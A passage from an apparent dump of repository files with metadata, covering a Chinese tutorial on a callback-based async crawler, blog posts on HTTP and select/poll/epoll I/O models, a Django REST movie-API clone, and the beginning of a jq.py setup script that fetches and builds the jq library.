pass\n```\n不幸的是,非阻塞套接字即使运行正常,也在connect上抛出了异常。这个异常重复底层C函数令人厌恶的行为,它通过将errno设置为EINPROGRESS来告诉你开始运行。\n\n现在,我们需要知道连接什么时候建立成功了,接着可以发送HTTP请求。我们可以简单的通过循环来探测是否建立了连接。\n\n```\nrequest = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\nencoded = request.encode('ascii')\n\nwhile True:\n try:\n sock.send(encoded)\n break # Done.\n except OSError as e:\n pass\n\nprint('sent')\n```\n这种方式不仅浪费CPU资源,而且不能有效的获取多个套接字上的事件。老的BSD Unix操作系统是通过select系统调用来解决这个问题的。他是一个在非阻塞套接字上等待事件的C函数。如今,在大量并发量级的网络应用驱使下,使用poll代替select,接着,BSD操作系统下的kqueue和Linux操作系统下的epoll也相继出现。他们都跟select相似,但在高并发的情况下,性能较好。\n\nPython3.4中的DefaultSelector会根据操作系统选择性能最好的select函数(select、poll或者epoll,kqueue)。为了注册网络I/O事件通知,我们创建了一个非阻塞的套接字并使用默认selector注册。\n\n```\nfrom selectors import DefaultSelector, EVENT_WRITE\n\nselector = DefaultSelector()\n\nsock = socket.socket()\nsock.setblocking(False)\ntry:\n sock.connect(('xkcd.com', 80))\nexcept BlockingIOError:\n pass\n\ndef connected():\n selector.unregister(sock.fileno())\n print('connected!')\n\nselector.register(sock.fileno(), EVENT_WRITE, connected)\n```\n\n我们忽略错误信息,并且调用selector.register,传入套接字文件描述符和事件类型常量。当连接建立了我们会收到通知,参数EVENT_WRITE:代表我们想知道什么套接字可写。方法参数connected是注册的回调函数,当事件发生时会执行。\n\n我们在一个循环中处理selector获取到的I/O事件通知:\n```\ndef loop():\n while True:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback()\n```\nconnected回调函数保存在event_key.data中,当我们收到非阻塞套接字连接建立之后立即执行connected回调函数。\n\n不同于前面的循环,select系统调用会阻塞,等待I/O事件发生。事件循环接着执行通知事件的回调函数。没有完成的事件将保持挂起,等待下一次事件循环执行。\n\n我们已经介绍了哪些内容?我们介绍了怎么开始一个操作,并且在事件准备好后,并且执行其回调函数;我们也介绍了一个异步框架,使用非阻塞套接字和事件循环,在单线程中执行并发操作。\n\n我们已经实现了“并发”,但不是传统意义上的“并行”。也就是说,我们构建了一个可以执行并发I/O的小系统,他可以在其他I/O操作正在执行时,启动新的操作。实际上,他不能利用多核进行并行计算。但是,这个系统是为I/O密集型问题设计的,而不是CPU密集型问题设计的。\n\n所以,我们的事件循环在并发I/O问题上是高效的,因为它不需要为每个连接浪费线程资源。但是,在我们继续之前,纠正一个误解:异步比多线程快。的确,通常在Python中,像我们这样的事件循环在处理少量活动连接的情况下,异步是比多线程稍微慢些,并且,运行时没有GIL的情况下,同样的负载下多线程可能更快。异步适用于事件很少,并有大量慢连接或不活跃连接的应用\n\n# 回调编程\n怎么使用我们构建的简洁的框架来实现网络爬虫呢?即使仅仅一个简单的url请求获取,实现起来都很痛苦。\n\n从设置全局变量urls_todo,和seen_urls开始:\n```\nurls_todo = set(['/'])\nseen_urls = set(['/'])\n```\n其中,seen_urls包括urls_todo和已经完成的url。这两个变量被初始化成根URL('/')。\n请求一个网页需要一系列的回调。当套接字connected的时候会触发connected回调,并发送get请求到服务端。但是,当需要等待一个返回时,需要注册另一个回调。如果这个回调触发了,才能读取全部的返回结果,这样循环往复的注册回调。\n\n我们把这些回调设计到一个Fetcher对象中。他需要一个URL,一个套接字对象和一个变量来存放返回结果。\n```\nclass Fetcher:\n def __init__(self, url):\n self.response = b'' # Empty array of bytes.\n self.url = url\n self.sock = None\n```\n我们调用的是Fetcher.fetch函数\n```\n# Method on Fetcher class.\n def fetch(self):\n self.sock = socket.socket()\n self.sock.setblocking(False)\n try:\n self.sock.connect(('xkcd.com', 80))\n except BlockingIOError:\n pass\n\n # Register next callback.\n selector.register(self.sock.fileno(),\n EVENT_WRITE,\n self.connected)\n \n```\nfetch函数首先建立一个socket连接,并声明为非阻塞,通知套接字方法在连接建立之前立刻返回,将控制流程交给事件循环等待连接。下面解析下为什么。假设我们按下面的结构构件应用程序:\n```\n# Begin fetching http://xkcd.com/353/\nfetcher = Fetcher('/353/')\nfetcher.fetch()\n\nwhile True:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback(event_key, event_mask)\n```\n调用select系统函数所有的事件通知都会在事件循环中被处理。之后,fetch函数将控制权交还给事件循环。当事件循环执行上面Fetcher中注册的connected回调函数时,应用程序这才知道socket建立完成了。\n\n下面是connected回调函数的实现:\n```\n# Method on Fetcher class.\n def connected(self, key, mask):\n print('connected!')\n selector.unregister(key.fd)\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(self.url)\n self.sock.send(request.encode('ascii'))\n\n # Register the next callback.\n selector.register(key.fd,\n EVENT_READ,\n self.read_response)\n```\nconnected函数发送一个Get请求。真实的应用将会检查返回值,假设全部的消息一次发送不完。但是我们的请求很小,并且我们的应用是正常的应用程序(无恶意)。所以,我们的应用直接调用send函数,然后等待返回结果。当然,他需要注册另外一个回调函数并将控制权交还给事件循环。最后一个回调函数read_response,处理服务端返回:\n\n```\n# Method on Fetcher class.\n def read_response(self, key, mask):\n global stopped\n\n chunk = self.sock.recv(4096) # 4k chunk size.\n if chunk:\n self.response += chunk\n else:\n selector.unregister(key.fd) # Done reading.\n links = self.parse_links()\n\n # Python set-logic:\n for link in links.difference(seen_urls):\n urls_todo.add(link)\n Fetcher(link).fetch() # <- New Fetcher.\n\n seen_urls.update(links)\n urls_todo.remove(self.url)\n if not urls_todo:\n stopped = True\n```\n这个回调函数将在selector检测到套接字是“readable”可读状态是被触发执行,这意味着两种可能的事情:一是套接字上的数据准备好了,另一个是套接字被关闭了。\n\n这个回调函数在准备好数据的套接字上读取1个chunk大小的数据(chunk小于等于4k),如果套接字上的数据大于4k,那么这次只读取4k,并且套接字保持readable状态,等待下次事件循环调度触发。当返回完成,服务端关闭套接字,并且返回空。\n\nparse_links方法没有介绍,他返回URL集合。每个URL实例化一个Fetcher实例,不存在并发的情况。\n\n注意使用带回调的异步编程的一个特点:在修改共享数据时不需要使用互斥,例如,我们对seen_urls添加元素。多任务没有抢占机制,所以,我们不能在代码中任意地方中断。\n\n我们添加一个stopped全局变量来控制事件循环:\n```\nstopped = False\n\ndef loop():\n while not stopped:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback()\n```\n当所有网页都下载完成,Fetcher将停止全局的事件循环,然后程序退出。\n\n这个例子使用面条式的写法使得异步程序看起来很简单。我们接下来要增加一些计算和I/O操作,并且调度这些操作并发执行。但不使用线程,这些操作也不能实现在一个函数中:当一个函数开始执行I/O操作,说明需要保持一个状态,并且将来会使用到,然后返回,你的职责是思考并且实现这个状态保持的程序。\n\n解释下这是什么意思呢?想想看,使用传统的阻塞I/O在线程中实现抓取一个URL是多么简单啊!\n```\n# Blocking version.\ndef fetch(url):\n sock = socket.socket()\n sock.connect(('xkcd.com', 80))\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\n sock.send(request.encode('ascii'))\n response = b''\n chunk = sock.recv(4096)\n while chunk:\n response += chunk\n chunk = sock.recv(4096)\n\n # Page is now downloaded.\n links = parse_links(response)\n q.add(links)\n```\n这个函数在不同套接字之间保存什么状态了?他保持有socket,url和累计的返回结果。传统线程中函数保存状态在堆栈的临时变量中。这个函数有一个“continuation”:会在I/O完成之后执行。运行时环境使用线程的指令指针来保存这个“continuation”。你不需要考虑在I/O完成之后重新保存这些本地变量和“continuation”,他是编程语言内置的功能。\n\n但是,基于回调的异步框架,这些编程语言的内置功能作用也不大。等待I/O时,函数需要明确保存状态,因为,在I/O完成之前函数就返回并且失去了他的栈帧。在我们基于回调的例子中,我们不使用本地变量,而是使用Fetcher的实例变量来保存sock和response。我们不使用指令指针,而是注册connected和read_response回调函数来保存“continuation”。随着应用功能的增加,我们需要手动通过回调保存的状态也越来越复杂。如此繁重的记账式的实现让开发者头疼。\n\n更糟糕的,在回调链在调度到下一个回调之前抛出了异常会发生什么?也就是说,我们在parse_links函数上实现的不好,解析某些页面时抛出了异常:\n```\nTraceback (most recent call last):\n File \"loop-with-callbacks.py\", line 111, in <module>\n loop()\n File \"loop-with-callbacks.py\", line 106, in loop\n callback(event_key, event_mask)\n File \"loop-with-callbacks.py\", line 51, in read_response\n links = self.parse_links()\n File \"loop-with-callbacks.py\", line 67, in parse_links\n raise Exception('parse error')\nException: parse error\n\n```\n异常堆栈中只显示事件循环在执行回调。我们无法知道什么导致了错误。这条链的两端都被破坏:我们忘记了要去哪里,也不知道从哪里来。这种丢失上下文称为“堆栈撕裂”,经常迷惑开发者。堆栈撕裂也阻止我们为回调链设置异常处理,也就是“try/except”块包裹的函数调用及其调用树。\n\n所以,我们避免讨论多线程和异步的效率,有关于哪个更易发错误的争论:多线程下,如果同步使用错误,容易受到数据竞争的影响。然而,回调因为堆栈撕裂的存在而难以调试。\n"
},
{
"alpha_fraction": 0.38181817531585693,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 12.75,
"blob_id": "db5e17d9d82a9fa1fa34029a08ad7ceb3a3a0d79",
"content_id": "9751664844652d7eb9ed405055c609e22bd1ad35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/source/alidb-monthly/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: alidb_monthly\ndate: 2018-09-28 21:19:20\n---\n"
},
{
"alpha_fraction": 0.7062146663665771,
"alphanum_fraction": 0.7271186709403992,
"avg_line_length": 19.34482765197754,
"blob_id": "0d5748036aef12528d89229f4d1c37daf4ec4ec0",
"content_id": "eb393e42f760571db5f2bf443ba8a58804333c9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3638,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 87,
"path": "/source/_posts/http.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: HTTP协议简介\ndate: 2018-02-02 21:23:59\ncategories: HTTP\ntags: [HTTP,TCP/IP,加密]\n---\n\n** 首先了解下TCP/IP四层模型: **\n- 应用层\n a. HTTP\n b. FTP\n c. DNS\n d. ...\n- 传输层:保证可靠传输\n a. TCP\n b. UDP\n- 网络层\n- 链路层\n\n下面这张图显示了HTTP请求的大概流程:\n\n图中清楚的展示了请求的处理流程,请求到达每一层都会加上响应的头部信息;返回则层次去掉的过程;\n传输层的TCP协议保证了数据的可靠传输,采用分段的方式传输报文;\n\n** TCP的可靠性保证:**\n - 连接时三次握手\n\n** 三次握手过程: **\n - 客户端发送带有SYN的连接请求到服务器端\n - 服务器端接受到客户端的连接请求后,发送带有SYN/ACK的连接请求收到的确认信息\n - 客户端收到服务端发送过来的请求确认后,再次发送服务端发送的确认信息收到的确认。此时连接建立;\n\n** HTTP无状态特性:** 保证可以快速处理更多事务,确保协议可伸缩性;但是有些场景需要保持用户的状态(如电商网站的登录状态,所以引入了cookie;\n\n** 持久连接(keep-alive)** 目前的HTTP1.1默认是持久连接的,即在多次请求中只有第一次是经过三次握手建立TCP连接的,直到有一端明确提出端口连接为止;\n在此持久连接的基础,可以支持并行发送多个请求,让整个请求时间减少;\n\n** Cookie: ** \n1. 客户端向服务端发送请求;\n2. 服务端生成cookie,并返回cookie 和 请求数据信息 给客户端\n3. 客户端接收到服务端发送过来的数据后,接下来的请求中会携带cookie信息和请求信息,服务端就可以根据cookie信息来判断是哪个客户端;\nRange:范围请求,客户端只请求指定的一部分数据\nRange:bytes=3000-5000\n服务器返回206,partial content的响应报文\n\n\n** Http报文 **\n包括:报文首部,报文主体\n- 报文首部:\n\t- 通用首部字段\n\t + cache-control\n\t + connection\n\t + ...\n\t- 请求首部字段\n\t + Accept\n\t + Accept-Charset\n\t + Accept-Encoding\n\t + User-Agent\n\t + Range\n\t + Authorization\n\t + ...\n\t- 响应首部字段\n\t + Accept-Ranges\n\t + ETag\n\t + Server\n\t + ...\n\t- 实体首部字段\n\t + Content-Encoding\n\t + Content-Language\n\t + Content-Type\n\t + Content-Range\n\t + ...\n\n** Http缺点 **\n 1. 明文传输不安全,内容可能被窃听\n 2. 不验证通讯方身份,有可能遭遇伪装\n 3. 无法判断报文是否完整,有可能被篡改\n\n** Https是Http通过和SSL或TSL组合加密的协议 **\n\n\n** HTTPS(SSL) 加密方式对比:**\n 1. 公开密钥加密思路:使用两个密钥,一个公钥,一个私钥,用户使用服务端的公开密钥加密数据包,然后发送到服务器端,服务端接收到数据包后,使用自己的私钥解密。这样即使数据包被窃取,由于没有解密的私钥,内容也不会被看到;\n 2. 共享密钥加密思路:解密和解密使用同一个密钥解密,这样密钥需要在客户端和服务端之间传递,才能到达解密的目的。传输密钥的过程可能被窃取,数据就可能被窃取到了;\n\nHttps是综合了公开密钥加密和共享密钥加密机制; 由于**公开密钥加密速度慢,但安全;共享密钥加密速度快,但密码可能被窃取**;\n所以HTTP结合两者优缺点,**在共享密钥传输密码阶段使用公开密钥加密,保证共享密钥的安全;之后的数据传输采用共享密钥加密的机制;**\n"
},
{
"alpha_fraction": 0.80402010679245,
"alphanum_fraction": 0.8198685646057129,
"avg_line_length": 34.45205307006836,
"blob_id": "ceaee287718a56b6618778caa8f82ac58b003613",
"content_id": "4b6f28c3a04ce594cc561c34b70fd5b4482ebb8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5885,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 73,
"path": "/source/_posts/io-model.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 四种基本的I/O模型\ndate: 2018-05-16 21:55:00\ncategories: IO\ntags: [Blocking,IO,同步,异步]\n---\n\n### 常用的四种IO模型:\n#### 1)blocking IO(阻塞IO模型)\n客户端需要等待服务端返回数据,整个过程是串行的\n#### 2)non-blocking IO(非阻塞IO)\n服务端立即相应客户端,数据没有准备好就返回Error,客户端需要轮询服务端获取想要的数据,直到数据准备好并返回\n#### 3)IO multiplexing(IO多路复用)\nIO多路复用的三种方式:\n\n- 1、select效率最低,但有最大描述符限制,在linux为1024。\n- 2、poll和select一样,但没有最大描述符限制。\n- 3、epoll效率最高,没有最大描述符限制,支持水平触发与边缘触发。\n\n**IO多路复用的优势**:同时可以监听多个连接,用的是单线程,利用空闲时间实现并发。\n\n#### 4)Asynchronous I/O(异步IO)\n用户进程发起read操作之后,立刻就可以开始去做其它的事。而另一方面,从kernel的角度,当它受到一个asynchronous read之后,首先它会立刻返回,所以不会对用户进程产生任何block。然后,kernel会等待数据准备完成,然后将数据拷贝到用户内存,当这一切都完成之后,kernel会给用户进程发送一个signal,告诉它read操作完成了。\n异步最大特点:全程无阻塞\n\n\n### sellect、poll、epoll三者的区别 :\n#### select:\n- 目前支持几乎所有的平台,默认单个进程能够监视的文件描述符的数量存在最大限制,在linux上默认只支持1024个socket,可以通过修改宏定义或重新编译内核(修改系统最大支持的端口数)的方式提升这一限制。\n- 内核准备好数据后通知用户有数据了,但内核不告诉用户是哪个连接有数据,用户只能通过轮询的方式来获取数据,假定select让内核监视100个socket连接,当有1个连接有数据后,内核就通知用户100个连接中有数据了,但是不告诉用户是哪个连接有数据了,此时用户只能通过轮询的方式一个个去检查然后获取数据,那么如果有上万个,十万个连接,那就得轮询上万次,上十万次,而所取的结果仅仅就那么1个,这样就会浪费很多系统开销\n- 只支持水平触发\n- 每次调用select,都需要把fd集合从用户态拷贝到内核态,这个开销在fd很多时会很大\n#### poll:\n\n- 与select没有本质上的差别,仅仅是没有了最大文件描述符数量的限制\n- 只支持水平触发\n- 只是一个过渡版本,很少用\n\n#### epoll:\n- Linux2.6才出现epoll,具备了select和poll的一切优点,公认为性能最好的多路IO就绪通知方法,没有最大文件描述符数量的限制,不支持windows平台\n- 内核准备好数据以后会通知用户哪个连接有数据了,IO效率不随fd数目增加而线性下降\n- 同时支持水平触发和边缘触发\n- 使用mmap加速内核与用户空间的消息传递(内存零拷贝)\n\n### 水平触发与边缘触发:\n** 水平触发:** 将就绪的文件描述符告诉进程后,如果进程没有对其进行IO操作,那么下次调用epoll时将再次报告这些文件描述符,这种方式称为水平触发\n\n** 边缘触发:** 只告诉进程哪些文件描述符刚刚变为就绪状态,它只说一遍,如果我们没有采取行动,那么它将不会再次告知,这种方式称为边缘触发\n\n### select和epoll的特点:\n#### select:\nselect通过一个select()系统调用来监视多个文件描述符的数组,当select()返回后,该数组中就绪的文件描述符便会被内核修改标志位,使得进程可以获得这些文件描述符从而进行后续的读写操作。由于网络响应时间的延迟使得大量TCP连接处于非活跃状态,但调用select()会对所有socket进行一次线性扫描,所以这也浪费了一定的开销。\n\n#### epoll:\n- epoll同样只告知那些就绪的文件描述符,而且当我们调用epoll_wait()获得就绪文件描述符时,返回的不是实际的描述符,而是一个代表就绪描述符数量的值,你只需要去epoll指定的一个数组中依次取得相应数量的文件描述符即可,这里也使用了内存映射(mmap)技术,这样便彻底省掉了这些文件描述符在系统调用时复制的开销。\n- 另一个本质的改进在于epoll采用基于事件的就绪通知方式。在select/poll中,进程只有在调用一定的方法后,内核才对所有监视的文件描述符进行扫描,而epoll事先通过epoll_ctl()来注册一个文件描述符,一旦基于某个文件描述符就绪时,内核会采用类似callback的回调机制,迅速激活这个文件描述符,当进程调用epoll_wait()时便得到通知。\n\n- select和poll都需要在返回后,通过遍历所有文件描述符来获取已经就绪的socket。事实上,同时连接的大量客户端在一时刻可能只有很少的处于就绪状态,因此随着监视的描述符数量的增长,其效率也会线性下降。\n\n### IO操作分两个阶段:\n- 1、等待数据准备好(数据读到内核缓存) \n- 2、将数据从内核读到用户空间(进程空间) \n一般来说第一阶段操作花费的时间远远大于第二阶段。 \n\n### 同步IO & 异步IO:\n** 同步IO ** :包括 blocking IO、non-blocking、select、poll、epoll(故:epool只是伪异步而已)(有阻塞)\n** 异步IO ** :包括:asynchronous (无阻塞)\n** 主要区别 ** :IO操作的第二阶段是阻塞的,然而这阶段操作花费时间远远小于第一个阶段,epoll和kqueue已经做到很好了。\n\n### Reactor & Proactor\n** Reacor模式 ** 包括:epoll(*nux), kqueue(FreeBSD)、select(POSIX标准)\n\n** Proactor模式 ** 包括:IOCP(Windows)"
}
] | 41 |
OtchereDev/Omdbapi-Clone | https://github.com/OtchereDev/Omdbapi-Clone | 9a4c1104e8b8b266009705ff1a5ee1bdb8c93f9e | 411c89944a1d6e7ba77e225a8ae263db08d6150f | 9baaafb88ecb1ac860cdc09896a1f9d3013cb861 | refs/heads/main | 2023-03-14T01:31:34.067791 | 2021-03-05T13:59:24 | 2021-03-05T13:59:24 | 344,828,234 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6107317209243774,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 24.5,
"blob_id": "a43ab2df49d2aef16135ca430c497590871b8f0e",
"content_id": "460bcc5563fd80aac62a12b1887dfc15337a9eaa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 40,
"path": "/api/models.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nRATE_CHOICES=(\n ('5','5 Stars'),\n ('4','4 Stars'),\n ('3','3 Stars'),\n ('2','2 Stars'),\n ('1','1 Stars'),\n ('N/A','N/A'),\n)\n\nTYPE=(\n ('movie','movie'),\n ('series','series'),\n ('episode','episode'),\n)\n\nclass Movie(models.Model):\n title=models.CharField(max_length=255)\n description=models.TextField()\n created=models.DateField()\n rated=models.CharField(choices=RATE_CHOICES,max_length=4)\n duration=models.CharField(max_length=10)\n genre=models.ForeignKey('Genre',on_delete=models.SET_NULL,null=True,blank=True)\n actors=models.TextField()\n country=models.CharField(max_length=200)\n type=models.CharField(choices=TYPE,max_length=10)\n poster=models.ImageField()\n director=models.CharField(max_length=250)\n language=models.CharField(max_length=250)\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Genre(models.Model):\n name=models.CharField(max_length=300)\n\n def __str__(self) -> str:\n return self.name\n \n"
},
{
"alpha_fraction": 0.48225805163383484,
"alphanum_fraction": 0.48225805163383484,
"avg_line_length": 23.639999389648438,
"blob_id": "7c7921699b151ac22cf5a90b38a2dfd49d1f9a18",
"content_id": "f2537d87ce963581ac94a251183712afee9f8032",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 25,
"path": "/api/serializers.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from rest_framework.serializers import ModelSerializer\nfrom .models import Genre, Movie\n\nclass GenreSerializer(ModelSerializer):\n class Meta:\n model=Genre\n fields=['name']\n\n\nclass MovieSerializer(ModelSerializer):\n genre=GenreSerializer()\n class Meta:\n model=Movie\n fields=['title',\n 'description',\n 'created',\n 'rated',\n 'duration',\n 'genre',\n 'actors',\n 'country',\n 'type',\n 'poster',\n 'director',\n 'language',]\n\n\n\n\n"
},
{
"alpha_fraction": 0.7875382900238037,
"alphanum_fraction": 0.7875382900238037,
"avg_line_length": 27.764705657958984,
"blob_id": "d2c77d6e4bcb98dfd295d28a2bfc13a0ee5bb5d1",
"content_id": "6a092de39f0589f30b31793f8f92d92693bf11a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 34,
"path": "/api/views.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.db.models import query\nfrom django.shortcuts import render\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView\nfrom django_filters.rest_framework import DjangoFilterBackend\n\n\nfrom .models import Genre, Movie\nfrom .serializers import MovieSerializer,GenreSerializer\n\n\nclass MovieListView(ListAPIView):\n queryset=Movie.objects.all()\n serializer_class=MovieSerializer\n filter_backends=[DjangoFilterBackend]\n filterset_fields = ['title','genre__name','language','type']\n\n\n\nclass MovieCreateView(CreateAPIView):\n serializer_class=MovieSerializer\n queryset=Movie.objects.all()\n\n\nclass MovieDetailView(RetrieveAPIView):\n lookup_field='title'\n queryset=Movie.objects.all()\n serializer_class=MovieSerializer\n\n\nclass GenreListCreateView(ListCreateAPIView):\n queryset=Genre.objects.all()\n serializer_class=GenreSerializer\n filter_backends=[DjangoFilterBackend]\n filterset_fields = ['name',]\n\n"
},
{
"alpha_fraction": 0.5094339847564697,
"alphanum_fraction": 0.5347877144813538,
"avg_line_length": 41.400001525878906,
"blob_id": "a42cdca2269bf0b691ef1700b12fcd1bd2c501d3",
"content_id": "645c686f8bf4acf77f1104cc2b05d95c5f03c9e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1696,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 40,
"path": "/api/migrations/0001_initial.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.7 on 2021-03-05 11:52\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Genre',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=300)),\n ],\n ),\n migrations.CreateModel(\n name='Movie',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('created', models.DateTimeField()),\n ('rated', models.CharField(choices=[('5', '5 Stars'), ('4', '4 Stars'), ('3', '3 Stars'), ('2', '2 Stars'), ('1', '1 Stars'), ('N/A', 'N/A')], max_length=4)),\n ('duration', models.TimeField()),\n ('actors', models.TextField()),\n ('country', models.CharField(max_length=200)),\n ('type', models.CharField(choices=[('movie', 'movie'), ('series', 'series'), ('episode', 'episode')], max_length=10)),\n ('poster', models.ImageField(upload_to='')),\n ('director', models.CharField(max_length=250)),\n ('language', models.CharField(max_length=250)),\n ('genre', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.genre')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.6935014724731445,
"alphanum_fraction": 0.6964112520217896,
"avg_line_length": 33.33333206176758,
"blob_id": "6b6f1e8e76ca948fc5a1578c61c0d8309b55203e",
"content_id": "4567e6750459e1d54213adcf45f482d4ec2b1c3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 30,
"path": "/api/urls.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls.conf import path\n\nfrom .views import GenreListCreateView, MovieCreateView, MovieDetailView, MovieListView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Omdbapi API Clone\",\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://[email protected]/\",\n contact=openapi.Contact(email=\"[email protected]\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napp_name='own_api'\nurlpatterns = [\n path('all_movies/',MovieListView.as_view()),\n path('add_movie/',MovieCreateView.as_view()),\n path('movie/<str:title>/',MovieDetailView.as_view()),\n path('genre/',GenreListCreateView.as_view()),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n]\n"
},
{
"alpha_fraction": 0.7599009871482849,
"alphanum_fraction": 0.7599009871482849,
"avg_line_length": 21.44444465637207,
"blob_id": "3c80edc24d0768ec290e1ac97be787e231bf64af",
"content_id": "24354d23dd4c5b53e628a44d5cdd9830aff49be1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 18,
"path": "/config/api_router.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.urls.conf import include, path\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nfrom drf_movies.users.api.views import UserViewSet\n\nif settings.DEBUG:\n router = DefaultRouter()\nelse:\n router = SimpleRouter()\n\nrouter.register(\"users\", UserViewSet)\n\n\napp_name = \"api\"\nurlpatterns = [path('',include('api.urls')),]\n\nurlpatterns+=router.urls\n"
}
] | 6 |
jaytcarlson/jq.py | https://github.com/jaytcarlson/jq.py | 0474a8a1f14bf72b425ebeab068be3d3d88b1536 | 8ba99762c386ec65115d97ee0fdcbfddb1e2f230 | 63a45fe73e38a3d445cab6b071fd2d2528561519 | refs/heads/master | 2021-01-22T16:31:27.700499 | 2015-09-13T17:16:04 | 2015-09-13T17:16:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6126260757446289,
"alphanum_fraction": 0.6227120161056519,
"avg_line_length": 28.733333587646484,
"blob_id": "64f06afb1e877fbb14b2d29a0f9302f38288f983",
"content_id": "e287b51bd639aff73084d962806193c1bcbab243",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2677,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 90,
"path": "/setup.py",
"repo_name": "jaytcarlson/jq.py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport platform\nimport subprocess\nimport tarfile\nimport shutil\n\ntry:\n import sysconfig\nexcept ImportError:\n # Python 2.6\n from distutils import sysconfig\n\nfrom setuptools import setup\nfrom distutils.extension import Extension\nfrom distutils.command.build_ext import build_ext\n\ntry:\n from urllib import urlretrieve\nexcept ImportError:\n from urllib.request import urlretrieve\n\ndef path_in_dir(relative_path):\n return os.path.join(os.path.dirname(__file__), relative_path)\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ntarball_path = path_in_dir(\"_jq-lib-1.5.tar.gz\")\njq_lib_dir = path_in_dir(\"jq-jq-1.5\")\n\nclass jq_build_ext(build_ext):\n def run(self):\n if os.path.exists(tarball_path):\n os.unlink(tarball_path)\n urlretrieve(\"https://github.com/stedolan/jq/archive/jq-1.5.tar.gz\", tarball_path)\n \n if os.path.exists(jq_lib_dir):\n shutil.rmtree(jq_lib_dir)\n tarfile.open(tarball_path, \"r:gz\").extractall(path_in_dir(\".\"))\n \n def command(args):\n print(\"Executing: %s\" % ' '.join(args))\n subprocess.check_call(args, cwd=jq_lib_dir)\n\n macosx_deployment_target = sysconfig.get_config_var(\"MACOSX_DEPLOYMENT_TARGET\")\n if macosx_deployment_target:\n os.environ['MACOSX_DEPLOYMENT_TARGET'] = macosx_deployment_target\n\n command([\"autoreconf\", \"-i\"])\n command([\"./configure\", \"CFLAGS=-fPIC\", \"--disable-maintainer-mode\"])\n command([\"make\"])\n \n build_ext.run(self)\n\n\njq_extension = Extension(\n \"jq\",\n sources=[\"jq.c\"],\n 